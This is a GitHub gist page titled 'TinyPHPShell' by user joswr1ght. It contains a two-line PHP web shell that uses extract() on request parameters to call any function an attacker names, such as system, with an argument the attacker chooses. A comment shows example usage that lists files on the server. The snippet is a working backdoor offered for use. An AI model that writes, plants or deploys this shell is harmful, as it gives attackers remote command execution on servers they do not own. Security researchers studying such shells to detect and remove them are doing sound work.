Skip to content

Instantly share code, notes, and snippets.

@joswr1ght
Created February 25, 2015 16:16
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save joswr1ght/376ebb86bd85e93a8318 to your computer and use it in GitHub Desktop.
Save joswr1ght/376ebb86bd85e93a8318 to your computer and use it in GitHub Desktop.
TinyPHPShell
# Attack with http://Site/shell.php?ctime=system&atime=ls+-la or even better a post.
@extract($_REQUEST);
@die ($ctime($atime));
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment